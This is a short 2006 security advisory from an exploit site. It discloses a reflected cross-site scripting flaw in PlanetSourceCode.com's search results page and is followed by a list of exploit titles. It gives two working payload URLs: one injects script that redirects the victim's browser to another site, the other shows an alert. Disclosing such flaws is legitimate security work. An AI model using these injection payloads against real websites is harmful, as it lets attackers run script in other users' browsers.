exploits , vulnerabilities , articles , Planetsource cross site scripting vulnerability

2006-02-26

Planetsource cross site scripting vulnerability

Rated as : Minimal Risk
##########################################################################################################
#---Cross-Site Scripting Vulnerability Found in Planetsourcecode.com
BrowseCategoryOrSearchResults.asp---#
#---Find by: T3rM1ght
----------/////////////////////////////////////////////////////////////////////////#
#---Release date: 2/26/2006
----/////////////////////////////////////////////////////////////////////////#
##########################################################################################################
The vulnerabilities have been found in the footer ads of
PlanetSourceCode.com when using the alert example
you can see exactly where in the page load the vulnerability occurs.

Examples:


Redirection:
http://www.planetsourcecode.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=<SCRIPT
LANGUAGE="JavaScript">window.location="http://www.securitydot.net/";</script>

Page Alerts:
http://www.planetsourcecode.com/vb/scripts/BrowseCategoryOrSearchResults.asp?txtCriteria=%22/%3E%3Cscript%3Ealert("Vunerability")%3C/script%3E

securitydot.net - 2006-02-26

Exploits - newest 10 RSS | More

2007-06-15 38446 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 20065 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 23886 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 20046 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 12345 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 10503 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 12716 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 10568 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 22722 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 11063 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit